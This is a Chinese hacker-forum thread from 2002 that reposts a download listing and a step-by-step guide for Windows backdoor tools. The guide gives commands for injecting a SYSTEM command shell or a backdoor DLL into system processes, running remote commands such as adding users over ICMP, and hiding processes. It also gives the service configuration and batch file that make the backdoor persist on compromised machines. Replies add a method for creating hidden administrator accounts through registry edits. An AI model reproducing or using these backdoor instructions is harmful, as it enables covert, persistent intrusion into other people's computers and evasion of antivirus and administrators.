转：新类型后门---热力推荐(附使用说明）。

新类型后门---热力推荐 door.zip Download by 小凤居 更新日期 2002-12-3 22:04:46 程序类别 黑客工具￤远程控制 文件大小 141K 授权方式 不详 应用平台 windows 推荐程度 程序主页 Home Page 下载/浏览 303/565 下载地址 http://www.chinesehack.org/down/show.asp?id=2971&down=1 简介： 几种比较有用的后门技术,包括EXE文件插入DLL,进程插入DLL,进程置入Shell等等，具体请看说明文件。 相关文章: 几种有用的后门技术的应用 ======================== CZH 于 2002.11.26 ------------------------- ------------------------- 转载请保持文章的完整性 一. 应用 1.在系统进程中插入SHELL 先上传InjShell.exe 到肉鸡 用法： 先查一下系统进程 用PSLIST.EXE PV.EXE 等查 一般有SMSS.EXE internat.exe svchost.exe conime.exe 等 InjShell.exe （进程.EXE） SHELLPORT 如 InjShell.exe internat.exe 1234 成功后 telnet ip 1234 就可以的到一个SYSTEM的CMD SHELL ！ 非常不错的后门，由于是系统进程所以很难被发现，也不会被查杀 随系统启动。 ----------------- 2.在系统进程插入DLL 用法： InjDll.exe （系统进程.EXE ） IcmpAttach.dll（后门DLL） 然后用客户端 IcmpReplySend.exe IP CMD 如IcmpReplySend.exe 127.0.0.1 “net user czh /add" 这样我们随时可以远程运行命令（SYSTEM权限的）并且是采用ICMP通讯，不开PORT，安全，可靠，隐密！ 刚完成测试，很不错 ，不过ICMP封包是名文的，用IRis抓到 ------------------------- 3.在DLL中插入EXE 用法：SetDll.exe 如 SetDll.exe NCX99.EXE NTDLL.DLL （为系统进程必用DLL库文件） 然后telnet 127.0.0.1 99 这样NCX99.EXE就不出现在进程中。 ---------------------------------------------------- ---------------------------------------------------- 二.补充：经测试后有一个问题，重启后不能再用，不过我想了一个办法，如下： 用ntservice.exe 把这几个文件安装成服务启动，方法如下 ： 1.建一个ntservice.ini文件,内容如下： [Settings] ServiceName = NTService （这行代表服务名） LogEnable = 0 ProcCount = 1 [Process0] CommandLine =system.bat （这行代表服务所要启动的文件） PauseStart = 1000 PauseEnd = 1000 UserInterface = No （这行代表后台运行） ========================================= 2.建一个system.bat文件如下： echo off InjDll.exe svchost.exe IcmpAttach.dll InjShell internat.exe 1234 SetDll.exe NCX99.EXE NTDLL.DLL ======================================== 3.把以上的InjDll.exe ，IcmpAttach.dll， ntservice.exe ，SetDll.exe， NCX99.EXE， ntservice.ini， system.bat 全部COPY到肉鸡 的WINNT\SYSTEM32文件夹中。 ======================================= 4. 安装： ntservice.exe -install net start ntservice 然后你就可以用这几个后门了，开机就能启动了！ =========================================== 5.卸载 net stop ntservice ntservice.exe -remove ========================================== 6.由于把SYSTEM.BAT加入到RUN键中开机会有CMD窗口，所以选择了安装成服务启动。 以上文件我已打包，要的找我，留EMAIL 或mail to:czh76821@etang.com 注：以上工具不是我写的，我只做了测试 ，本文是我的测试心得。由于某种原因（太广泛的传播有害）没有写名工具出处和作者，请作者凉解。并请收到和运用者别乱传播，以便于长久的运用和交留，而不很快成为杀毒软件的卖点。谢谢。

不错
t
t

牛B~收下

那个：“以上文件我已打包，要的找我，留EMAIL  或mail to:czh76821@etang.com”
是你吗？还是只能找那个人要？

用处不大
我们改用隐藏后门
只要在名字后面加上$这个字符，用net user 这个命令就不会看见
我们在用改guest的办法，把administrator的注册表改进我们要加的隐藏名字里！
就完事ok了！
现在回到cmd下用net user 隐藏名字 /del
看看，删都没办法删！

在注册表的sam_sam 下可以看到你加的用户的
除非把sam_sam 搞的谁也不能看了
那也就知道有人搞了破坏了啊：）
上面的后门是很安全的啊

己经注明了是转贴。。。。。。
那个EMAIL肯定不是我嘛。。。呵呵，里面有下载的链接呀。可以下的。

处了administrator谁还能看

我试过,这种后门确实是精典,不过就是一点很不爽,装了后门后只能用一次,并且重启了就没了.........希望以后有别的版本可以解决这个问题吧....

[这个贴子最后由lengfeng在 2002/12/14 03:34pm 第 1 次编辑]

你说的可能不对啊

我晕，情绪啊，别人说的不对你可以提出啊，但是不要骂人啊，就是骂，也不要在公众场合骂啊，不要不给别人面子啊。了解你的人知道你的脾气，不了解的还以为…………

情绪你个土人在说谁呢,你试过这种后门没有??!!!

[这个贴子最后由lengfeng在 2002/12/14 03:35pm 第 1 次编辑]

我用的全是这种,关100次也还是在!

[这个贴子最后由stone在 2002/12/14 03:39pm 第 1 次编辑]

你试过这个后门!!!!
我发的这几个!!!你看清楚了.
没试过我发的这种你就不要在这里瞎讲!!!

摸试过,跟你吐撒口水!